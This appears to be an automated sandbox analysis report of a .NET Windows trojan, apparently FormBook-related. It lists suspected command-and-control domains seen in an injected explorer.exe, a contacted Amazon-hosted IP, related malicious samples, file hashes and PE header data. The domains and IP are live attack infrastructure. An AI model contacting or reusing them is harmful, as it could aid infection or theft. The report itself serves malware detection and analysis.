                                                                                              http://www.ax-th-6011838.fyi/m25s/explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.attoomasteracademy.onlineexplorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.cskuvq.shop/m25s/oexplorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.uykoii.shop/m25s/explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://www.xewaov.xyzReferer:explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.araghospitality.netReferer:explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.anforexuytin.cfdexplorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.fontbureau.com/designers/cabarga.htmlNTU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.founder.com.cn/cnTU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.cskuvq.shop/m25s/explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.armanshop.xyzReferer:explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.olnacasinotcs14.topexplorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.armanshop.xyzexplorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://www.dt5r.shop/m25s/www.cctofi.cpaexplorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.msn.com:443/en-us/feedexplorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.cleans.xyz/m25s/explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          		unknown
                                                                                                          https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.cskuvq.shop/m25s/www.olnacasinotcs14.topexplorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.ierra777.vip/m25s/www.cskuvq.shopexplorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.pringhillinfos.netexplorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.attoomasteracademy.online/m25s/www.raphic-design-degree-33148.bondexplorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://excel.office.comexplorer.exe, 00000004.00000002.2638429604.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1716978522.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2687008894.000000000978C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2690919232.00000000097A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000004.00000000.1709658723.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2630983803.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4157313881.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2730957946.0000000004DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.6uzh.digital/m25s/explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.sajatypeworks.comTU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.founder.com.cn/cn/cTheTU0kiz3mxz.exe, 00000000.00000002.1708998132.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.anforexuytin.cfd/m25s/www.ildcraft.xyzexplorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://www.ildcraft.xyzReferer:explorer.exe, 00000004.00000002.2640564416.000000000CB26000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://www.wistlnc.net/m25s/www.armanshop.xyzexplorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://www.wistlnc.net/m25s/explorer.exe, 0000000F.00000002.4170482498.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2796386858.00000000097DB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3926755657.00000000097DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://outlook.com2025-01-10T1explorer.exe, 0000000F.00000003.2687008894.000000000978C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown

                                                                                                                    World Map of Contacted IPs

                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs

                                                                                                                    Public IPs

                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    13.248.169.48
                                                                                                                    		www.cleans.xyzUnited States
                                                                                                                    		16509AMAZON-02UStrue

                                                                                                                    General Information

                                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                                    Analysis ID:1587624
                                                                                                                    Start date and time:2025-01-10 15:54:09 +01:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:0h 12m 8s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:default.jbs
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Number of analysed new started processes analysed:25
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:1
                                                                                                                    Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Sample name:TU0kiz3mxz.exe
                                                                                                                    renamed because original name is a hash value
                                                                                                                    Original Sample Name:20fdf7fbe573d9233084f2f338379815159e9c057a5b1189f8007d3ccf0e4204.exe
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal100.troj.evad.winEXE@24/1@12/1
                                                                                                                    EGA Information:
                                                                                                                    • Successful, ratio: 100%
                                                                                                                    HCA Information:
                                                                                                                    • Successful, ratio: 98%
                                                                                                                    • Number of executed functions: 164
                                                                                                                    • Number of non-executed functions: 288
                                                                                                                    Cookbook Comments:
                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                    Warnings

                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, backgroundTaskHost.exe, SearchApp.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe, StartMenuExperienceHost.exe, TextInputHost.exe, mobsync.exe
                                                                                                                    • Excluded IPs from analysis (whitelisted): 204.79.197.203, 184.28.90.27, 4.245.163.56, 13.107.246.45, 20.190.160.20, 2.23.227.208, 2.23.227.215
                                                                                                                    • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, r.bing.com, a-0003.a-msedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, api-msn-com.a-0003.a-msedge.net
                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                    • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                    • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                    • Report size getting too big, too many NtSetValueKey calls found.

                                                                                                                    Simulations

                                                                                                                    Behavior and APIs

                                                                                                                    TimeTypeDescription
                                                                                                                    09:55:07API Interceptor1x Sleep call for process: TU0kiz3mxz.exe modified
                                                                                                                    09:55:36API Interceptor7770381x Sleep call for process: explorer.exe modified

                                                                                                                    Joe Sandbox View / Context

                                                                                                                    IPs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    13.248.169.48QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.bonheur.tech/t3iv/
                                                                                                                    QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.bonheur.tech/t3iv/
                                                                                                                    ORDER REF 47896798 PSMCO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                    • www.londonatnight.coffee/13to/
                                                                                                                    236236236.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • portlandbeauty.com/
                                                                                                                    profroma invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.aktmarket.xyz/wb7v/
                                                                                                                    SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.xphone.net/i7vz/
                                                                                                                    RFQ_P.O.1212024.scrGet hashmaliciousFormBookBrowse
                                                                                                                    • www.krshop.shop/5p01/
                                                                                                                    SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                    • sharewood.xyz/administrator/index.php
                                                                                                                    MA-DS-2024-03 URGENT.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.snyp.shop/4nyz/
                                                                                                                    Recibos.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.egyshare.xyz/lp5b/

                                                                                                                    Domains

                                                                                                                    No context

                                                                                                                    ASNs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    AMAZON-02UShttps://booking.extrantelabelason.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                    • 18.245.31.49
                                                                                                                    https://samantacatering.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • 99.86.4.125
                                                                                                                    https://www.filemail.com/d/rxythqchkhluipl?skipreg=trueGet hashmaliciousUnknownBrowse
                                                                                                                    • 18.245.46.20
                                                                                                                    vevhea4.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 54.171.230.55
                                                                                                                    file.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 13.251.16.150
                                                                                                                    file.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 13.251.16.150
                                                                                                                    file.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 54.171.230.55
                                                                                                                    file.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 54.217.10.153
                                                                                                                    https://app.planable.io/review/0OPaw36t6M_kGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 52.17.171.17
                                                                                                                    https://we.tl/t-fnebgmrnYQGet hashmaliciousUnknownBrowse
                                                                                                                    • 18.245.46.98

                                                                                                                    JA3 Fingerprints

                                                                                                                    No context

                                                                                                                    Dropped Files

                                                                                                                    No context

                                                                                                                    Created / dropped Files

                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TU0kiz3mxz.exe.log

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\TU0kiz3mxz.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1216
                                                                                                                    Entropy (8bit):5.34331486778365
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                    Malicious:true
                                                                                                                    Reputation:high, very likely benign file
                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                    Static File Info

                                                                                                                    General

                                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                    Entropy (8bit):7.484341258502357
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                                                    File name:TU0kiz3mxz.exe
                                                                                                                    File size:766'976 bytes
                                                                                                                    MD5:5bc818a30e4d9d8a6bb828767ca1bf2a
                                                                                                                    SHA1:b0ce6d58037a4f05cb31eeca7db4ad2c347bc358
                                                                                                                    SHA256:20fdf7fbe573d9233084f2f338379815159e9c057a5b1189f8007d3ccf0e4204
                                                                                                                    SHA512:d4d674c4cc0484160b4458cfbf6c670b066536241b9888c9b022ca2ee5bdf83e35153508ba5a5cd6127bab53704d8af49e89dcd2c92de9fd110f1164d34db3d2
                                                                                                                    SSDEEP:12288:6EUHsWksNFwTFMKh5EOU30lLG6wVxm0f8dIqCSzy+MbM+jikHUUkLItauQmE:YsWfY+sy30lLG5xm+87CSzEE+PtaoE
                                                                                                                    TLSH:03F4AE1476948F63CA7587F53872E0B413FC1EAEA01AE2555DC17EEB79A2F048960F83
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................... ............@................................

                                                                                                                    File Icon

                                                                                                                    Icon Hash:90cececece8e8eb0

                                                                                                                    Static PE Info

                                                                                                                    General

                                                                                                                    Entrypoint:0x4bc606
                                                                                                                    Entrypoint Section:.text
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0xACB40EDC [Tue Oct 25 15:57:16 2061 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:4
                                                                                                                    OS Version Minor:0
                                                                                                                    File Version Major:4
                                                                                                                    File Version Minor:0
                                                                                                                    Subsystem Version Major:4
                                                                                                                    Subsystem Version Minor:0
                                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                    Entrypoint Preview

                                                                                                                    Instruction
                                                                                                                    jmp dword ptr [00402000h]
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al
                                                                                                                    add byte ptr [eax], al

                                                                                                                    Data Directories

                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xbc5b40x4f.text
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xbe0000x61c.rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xc00000xc.reloc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xb858c0x70.text
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
